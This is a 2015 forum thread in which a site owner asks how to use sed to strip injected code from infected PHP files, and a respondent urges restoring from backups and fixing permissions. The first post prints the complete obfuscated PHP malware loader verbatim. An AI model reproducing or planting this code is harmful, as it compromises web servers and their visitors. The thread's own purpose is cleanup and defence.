Deleting from .php files


 
Thread Tools Search this Thread
Top Forums UNIX for Dummies Questions & Answers Deleting from .php files
# 1  
Old 02-18-2015
Deleting from .php files

Hello,

I have infected .php files on my server with some code (example at the bottom,code marked red must be deleted, all .php files were infected with this same code). I was wondering how can i delete the first <?php ?> with that all code inside ?Smilie
I already tried with : find . -name "*.php" -type f -exec sed -i '/if(!isset($GLOBALS/d' {} \;

but it deletes the whole line including the second <?php. Smilie

Thanks for the help !!




Code:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $jxugeftloh = 'ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x7825452]88]5]48]32M3]317]sboepn)%x5c%x7825epnbss-%x5c%I,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x782hA)3of>2bd%x5c%x7825!<5h%62]47y]252]18y]#>q%x5c%x7825<#762]67y]562]787fw6*%x5c%x787f_*#ujojx5c%x7860%x5c%x7825}X;!spdovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-825j=6[%x5c%x7825ww2!>#~%x5c%x7824<%x5c%x78e%x5c%x78b%x57825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1%x5c%x7825bss%x5c%x785csboc%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88s%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860b98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:533]65]y31]53]y6d]281]y4%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597fx5c%x7825bss-%x5c%x7825r%x5c%782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x77825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%6c6f+9f5d816:+946:ce44#)zbssbji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]55#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P68786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78445]212]445]43]321]464]284]364]6]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254x72%162%x61%171%x5f%155%x61%160y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sc%x7824-%x5c%x7824%x5c%x785cf_*#fubfsdXk5%x5c%x7860{66 chr(ord($n)-1);} @error_reporting(0); preg_replace("%x2f%538y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%1657,27R66,#%x5c%x782fq%x5c%x78d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785d%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x{ftmfV%x5c%x787f<*X&Z&S{7827jsv%x5c%x78256<C>^#zsfvr-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*8>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5pd%x5c%x7825w6Z6<.3%x5c%x78605c%x7824-%x5c%x7824]y8%x5c%x7824-)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fm82f#)rrd%x5c%x782f#00;quui#>.%x5c%x78*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x2]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#4265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%xx5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x3]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!O!*#opo#>>}R;msv}.;%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x3a%146%x21%76%x21%50%x5c%x782585cq%x5c%x78257%x5c%x782f7#@#7%x5c7825)sutcvt)esp>hmg%x5c%x775%156%x61"])))) { $GLOBALS["%x61%156%x75%15]#-bubE{h%x5c%x7825)tp]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x7bqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!h%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!7827tfs%x5c%x78256<*17-SFEBF:-t%x5c%x7825)3of:opjuc%x7825mm)%x5c%x7825%x5c%x787fqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x0QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFS!*uyfu%x5c%x7827k:!fvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5FGFS%x5c%x7860QUUI&c_UO1^-%x5c%x7825r%x5c%x78x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x78252b%x5c%x7825)gpf{jt)!gj!<*2bbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmz>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%xgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825bc%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#4*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35%x5c%x7825j^%x5c%x7824-%x5c%x7824t:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x782+fepdfe{h+{d%x5c%x7825%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*d%160%x6c%157%x64%145%x28%141%!%x5c%x7825s:N}#-%x5c%x78%x5c%x7825}U;y]}R;2]},;osvufs}%#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x25>2q%x5c%x7825<#g6R85,%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x8:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#VMM*<%x22%51%x29%51%x29%73", NULL); }825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c5c%x782f#%x5c%x7825#%x5c%x782f#o%x5c%x7827u%x5c%x7825)7fmji%x5c%x7c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x78x5c%x7825)s%x5c%x7825>%x525o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<78]K5]53]Kc#<%x5c%x7825tpz!>!#]dXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78]y76]61]y33]68]y34]68]yjudovg!|!**#j{hnpd#)tutjyf%x46767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<p82f+*0f(-!#]y76]277]y72]24-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x7fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x786tfsqnpdov{h19275j{hnpd19275fubmgojqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x70%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6mg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>D6M7]K3#<%x5c%x7825ydovg<~%x5c%x7824<!%x5c%xx7827)fepdof.)fepdof.%x%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7827825t2w>#]y74]273]y76]252]y0{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%xNBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsx5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opju82f#M5]DgP5]D6#<%x5c%x7825fdy>#]Dp#%x5c%x782f#p#%x5c%x782f%4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Dc%x7825w6<%x5c%x787fw6x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x7e))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x78f#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfi-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x56]y39]252]y83]273]y72]282#<!%x5c%x7825{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+9938<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*5fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ld%x5c%x7824%x5c%x782f)tutjyf%x5c%x7860439275t6<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x525!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%#>b%x5c%x7825!**X)ufttj%x5c%x7822)gjc%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<if((function_exists("%x6f%142%x5f>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)eu825!<12>j%x5c%x7825!|!*#91y]c9y]g2257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1tjw!>!#]y84]275]y83]248]y83]256]y81]2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qjj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#eTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!]36]73]83]238M7]381]211M5]67]|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7867R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%-s.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.d%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmH*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]25c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|y>#]D6]281L1#%x5c%x7%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-!%x5c%x7825w%x5c%x78%x5c%x78256<*Y%x5c%x7825)fnbozcYufhAvctus)%x5c%x7825%x5c%x7824-%xhA%x5c%x7827pd%x5c%x78256<pd%x5c6%x61"]=1; function fjfgg($n){returnmsv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpVc%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y75c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQc%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y7Rk3%x5c%x7860{666~6<&w6<%x5c%x787860%x5c%x7878%x5c%x7822l:!}V;3q2f%x5c%x7825r%x5c%x7878<~!%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x782760%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7tmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%d>}&;!osvufs}%x5c%x787f;!opjudo5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqp5c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5cFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%~6<&w6<%x5c%x787fw6*CW&)7gj6<*5bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x782!>!ssbnpe_GMFT%x5c%x786,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R5uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;g%x28%42%x66%152%x66%147%x67%42%%163%x74%141%x72%164") && (!isset($GLOBALS["%x61%156%x)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x25)sf%x5c%x7878pmpusut)%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7vg}k~~9{d%x5c%x7825:osvufs:~92x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860uy]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!op5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5cx5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825fldpt}X;%x5c%x7860msvd}R;*msv%x5c%x785cq%x5c%x7825)ufttj5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eob%x5c%x7878:!>#]y3g]61]y3f]63]y3/(.*)/epreg_replacevpxaiynkki'; $xnztbsbewp = explode(chr((184-140)),'7128,33,9415,54,2905,44,8279,36,1568,59,5444,49,4264,30,1385,31,9384,31,1667,65,2813,32,10075,31,4081,52,4986,68,1852,54,2139,29,8247,32,4423,64,9044,67,6285,46,2766,47,4652,34,1233,68,7239,41,2603,54,9838,47,8108,54,5846,44,4883,52,7316,68,8182,36,9539,40,2845,34,790,41,1982,28,6331,35,9984,25,3759,64,8315,56,1542,26,9172,30,58,67,6892,55,6048,22,2279,69,3224,28,175,55,6472,44,353,24,8618,32,5144,68,5731,53,9661,44,9953,31,8956,47,9317,67,3419,61,1906,52,7815,43,3654,63,3863,34,3931,62,3093,53,5493,35,2949,22,5246,69,6778,70,3038,55,9469,47,2879,26,7205,34,9705,67,4958,28,7966,60,6664,65,3626,28,7739,36,7161,44,286,25,6070,44,2242,37,6947,65,5630,23,10009,66,620,49,5315,59,669,35,7384,56,4728,44,9516,23,6597,67,1101,29,9242,23,3345,54,3520,23,9111,61,2475,70,7012,36,3480,40,8026,62,3399,20,8885,40,377,25,2700,24,995,42,6414,58,8925,31,9631,30,2059,36,6868,24,5212,34,6555,42,4205,59,4133,22,5528,58,8371,45,8755,63,1958,24,0,58,9265,52,1732,28,4400,23,7565,63,3146,38,8650,32,4319,31,5890,61,402,51,4350,50,4620,32,3823,40,8581,37,7907,59,6516,39,7280,36,2409,66,5704,27,9579,52,7628,65,4772,25,578,42,1416,43,9885,68,2201,41,1130,39,2348,61,311,42,1627,40,3252,22,5606,24,2724,42,8416,60,1760,48,6221,64,1514,28,4047,34,8218,29,2545,58,1459,55,3303,42,2168,33,4155,50,7526,39,5078,66,9772,66,7775,40,230,56,3993,54,2095,44,8518,63,4686,42,8476,42,7440,57,146,29,5784,62,509,43,7858,49,3543,22,9003,41,1037,64,966,29,897,69,7693,46,704,63,6366,48,4852,31,5586,20,8088,20,5951,33,6010,38,6179,42,5374,70,4585,35,5653,51,9202,40,6729,49,1169,64,7497,29,125,21,1301,33,3184,40,552,26,6114,65,8682,26,4294,25,4797,55,8708,47,3897,34,1808,44,7048,52,7100,28,8162,20,8818,67,453,23,5984,26,3565,61,3717,42,476,33,3274,29,4487,61,2010,49,6848,20,831,66,2971,67,5054,24,1334,51,4935,23,767,23,2657,43,4548,37'); $btlqhhqoie=substr($jxugeftloh,(57237-47131),(43-36)); if (!function_exists('esbrqdomyj')) { function esbrqdomyj($mfogoxofzk, $wtumojzkgj) { $qwrxuqdeeg = NULL; for($ndstkanjru=0;$ndstkanjru<(sizeof($mfogoxofzk)/2);$ndstkanjru++) { $qwrxuqdeeg .= substr($wtumojzkgj, $mfogoxofzk[($ndstkanjru*2)],$mfogoxofzk[($ndstkanjru*2)+1]); } return $qwrxuqdeeg; };} $rzjxiyoptf="\x20\57\x2a\40\x69\153\x6f\155\x69\147\x66\151\x72\144\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\64\x39\55\x31\61\x32\51\x29\54\x20\143\x68\162\x28\50\x33\70\x39\55\x32\71\x37\51\x29\54\x20\145\x73\142\x72\161\x64\157\x6d\171\x6a\50\x24\170\x6e\172\x74\142\x73\142\x65\167\x70\54\x24\152\x78\165\x67\145\x66\164\x6c\157\x68\51\x29\51\x3b\40\x2f\52\x20\170\x6f\166\x69\141\x65\142\x6c\145\x61\40\x2a\57\x20"; $jauobgpser=substr($jxugeftloh,(67677-57564),(38-26)); $jauobgpser($btlqhhqoie, $rzjxiyoptf, NULL); $jauobgpser=$rzjxiyoptf; $jauobgpser=(385-264); $jxugeftloh=$jauobgpser-1; ?><?php
// Silence is golden. And We are agree :)
?>


Last edited by Corlex31; 02-18-2015 at 12:28 PM..
# 2  
Old 02-18-2015
If your PHP has been infected, stop messing about with sed, restore from backups or reinstall, and change your permissions so it can't happen again or they will just put it right back.
# 3  
Old 02-18-2015
Quote:
Originally Posted by Corona688
If your PHP has been infected, stop messing about with sed, restore from backups or reinstall, and change your permissions so it can't happen again or they will just put it right back.
I appreciate your answer, but I don't have any backups, also reinstall is not an option Smilie
# 4  
Old 02-18-2015
Why not? Was this PHP all hand-written?
# 5  
Old 02-18-2015
Quote:
Originally Posted by Corona688
Why not? Was this PHP all hand-written?
Some of it yes. I'd really appreciate if anyone could send me the right command i'm not very close with unix Smilie
# 6  
Old 02-18-2015
I can't give you a sed command I'd trust to fix a problem like this. It may not all be the same, and if you miss any bit of it it's liable to all come back.

"some of it" means most wasn't. THAT you can restore from backup or an old version and save yourself a huge amount of work -- and everything which is hand-written, you can hand-fix.

Make a list of all files ordered by modification time. You can probably spot most of the infected files, they don't usually bother to fake the modification time (and depending on users and permissions, may have been physically unable to). That will save a lot of time.

Be sure to fix the permissions, or the problem will keep repeating. Please at least shut down your web server in the meantime.
# 7  
Old 02-18-2015
Quote:
Originally Posted by Corona688
"some of it" means most wasn't. THAT you can restore from backup or an old version and save yourself a huge amount of work -- and everything which is hand-written, you can hand-fix.

I can't give you a sed command I'd trust to fix a problem like this. It may not all be the same, and if you miss any bit of it it's liable to all come back.

Be sure to fix the permissions, or the problem will keep repeating. Please at least shut down your web server in the meantime.

If you give me a sed command i'll try and see with cygwin64. The code which was appended was same in every .php i checked. About backups and stuff, it would take me too much effort to reinstall all things and make it like it was. So if you can give mi any sed or any else comands which should work i will be really grateful . Smilie
 
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Deleting files

Hi I have an AIX server. I'm planning to use the below script to remove 60 days older files. find /path/ -mtime +60 -exec rm -f {} \; I just want to make sure it will only remove the files. I don't want the directories to be removed. If in case it will delete the directories... (2 Replies)
Discussion started by: newtoaixos
2 Replies

2. Shell Programming and Scripting

Bash script deleting my files, and editing files in subdirectories question

#!/bin/bash # name=$1 type=$2 number=1 for file in ./** do if then filenumber=00$number elif then filenumber=0$number fi tempname="$name""$filenumber"."$type" if (4 Replies)
Discussion started by: TheGreatGizmo
4 Replies

3. Shell Programming and Scripting

Deleting files

Hi all, I have developed a shell script to copy the files from source to destination and simultaneously to delete the copied files in source. I can copy the files but the files cannot be deleted in source side. (3 Replies)
Discussion started by: Venkatesan
3 Replies

4. Shell Programming and Scripting

AIX system.... deleting files in remote directory after retrieving files

Hi Friends, I am new to this , I am working on AIX system and my scenario is to retrive the files from remote system and remove the files from the remote system after retreving files. I can able to retrieve the files but Can't remove files in remote system. Please check my code and help me out... (3 Replies)
Discussion started by: vinayparakala
3 Replies

5. UNIX for Dummies Questions & Answers

deleting files

:confused: hi all, I need to delete all the files from a archieve directory whose filename starts with 2008, 2009. The folder consists of 2008, 2009, 2010 and 2011. the filename example is as below: 20081111_12_asc_ac_st.zip similarly there are files for 2009. There are around... (2 Replies)
Discussion started by: abhi_123
2 Replies

6. Shell Programming and Scripting

Need help comparing two files and deleting some things in those files!

So I have two files: File1 pictures.txt 1.1 1.3 dance.txt 1.2 1.4 treehouse.txt 1.3 1.5 File2 pictures.txt 1.5 ref2313 1.4 ref2345 1.3 ref5432 1.2 ref4244 dance.txt 1.6 ref2342 1.5 ref2352 1.4 ref0695 1.3 ref5738 1.2 ref4948 1.1 treehouse.txt 1.6 ref8573 1.5 ref3284 1.4 ref5838... (24 Replies)
Discussion started by: linuxkid
24 Replies

7. UNIX for Dummies Questions & Answers

df -k and deleting files

hi everybody, urgently need solutioin aftet i execute the command df -k, i get to see al the memory status blah blah if some file system has 95% full then what should i do and any help on how and what to do ? help really appriciated. cheers (4 Replies)
Discussion started by: ajayr111
4 Replies

8. UNIX for Dummies Questions & Answers

Deleting Files

Hi, I have been working with files in emacs and a file showed up in my directories called #main.c# (the original file being main.c). However I cannot delete this #main.c# file. Any suggestions? (1 Reply)
Discussion started by: bc4
1 Replies

9. Solaris

Deleting files

OK, Easy question probably, I have a directory that is full of like 1000 files. I want to get rid of files more than 5 days old. Is there an easy way to do this? there are like 800 files that fit into this category so doing it manually would be a pain. Any help is appreciated! (1 Reply)
Discussion started by: BG_JrAdmin
1 Replies

10. Shell Programming and Scripting

Deleting old files

Hi, I have a directory which contains files.This Directory keeps getting in new files from time to time.I want to maintain only 15 files in that directory at any time and the old files should be deleted. Eg: Directory 'c' @'a/b/c contains: 1_a 2_a 3_a... I want to delete all the old... (2 Replies)
Discussion started by: shiroh_1982
2 Replies
Login or Register to Ask a Question